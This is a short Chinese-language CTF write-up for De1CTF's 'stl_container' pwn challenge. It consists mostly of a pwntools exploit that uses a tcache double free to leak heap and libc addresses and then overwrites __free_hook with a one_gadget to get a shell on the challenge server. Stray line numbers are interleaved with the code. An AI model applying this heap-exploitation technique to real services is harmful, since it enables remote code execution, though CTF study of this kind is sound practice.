De1CTF

爆0选手一号准备就绪,菜鸟打不动De1CTF

stl_container

只做了一个签到题,作为一个签到选手,mips不会做,安卓也不会,连游戏MC也没玩过,只能做一个签到题才能勉强更新出这一页(其实半页都没有)
题目不难,tcache结构下,在free(2,0)处可以两次free

from pwn import*
def new(ch,content):
	"""Drive menu action 1 (add an element) on the remote menu.

	Selects container *ch* at the first ``>>`` prompt, action ``1`` at the
	second, then sends *content* raw (no trailing newline) once the
	``data:`` prompt arrives.
	"""
	for choice in (str(ch), '1'):
		p.sendlineafter('>>', choice)
	p.sendafter('data:', content)
def free(ch,index):
	"""Drive menu action 2 (remove an element) on the remote menu.

	Containers 3 and 4 are not asked for an index by the target; every
	other container gets *index* sent after the ``index?`` prompt.
	"""
	asks_for_index = ch not in (3, 4)
	for choice in (str(ch), '2'):
		p.sendlineafter('>>', choice)
	if asks_for_index:
		p.sendlineafter('index?', str(index))
def show(ch,index):
	"""Drive menu action 3 (print an element) on the remote menu.

	Same prompt flow as ``free``: containers 3 and 4 take no index, the
	others are sent *index* after ``index?``. The printed data is left in
	the tube for the caller to read.
	"""
	asks_for_index = ch not in (3, 4)
	for choice in (str(ch), '3'):
		p.sendlineafter('>>', choice)
	if asks_for_index:
		p.sendlineafter('index?', str(index))
context.log_level ='DEBUG'
17
p = process('./main')
18
p = remote('134.175.239.26',8848)
19
libc =ELF('./libc-2.27.so')
20
new(3,'\x00'*0x80 + p64(0) + p64(0xA1))
21
new(1,'FMYY')
22
new(1,'FMYY')
23
new(2,'FMYY')
24
free(2,0)
25
new(2,'\xB0')
26
show(2,0)
27
p.recvuntil('data: ')
28
heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x124B0
29
log.info('HEAP:\t' + hex(heap_base))
30
new(2,'FMYY')
31
new(3,'FMYY')
32
new(4,'FMYY')
33
new(4,'\x00'*0x50 + p64(0) + p64(0x41))
34
free(2,0)
35
free(2,0)
36
new(2,p64(heap_base + 0x125E0))
37
new(2,p64(0) + p64(0x421))
38
free(1,0)
39
new(1,'FMYY')
40
show(1,0)
41
p.recvuntil('data: ')
42
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook']
43
log.info('LIBC:\t' + hex(libc_base))
44
free_hook = libc_base + libc.sym['__free_hook']
45
rce = libc_base + 0x4F322
46
free(2,0)
47
free(2,0)
48
new(2,p64(free_hook))
49
new(2,p64(rce))
50
p.interactive()

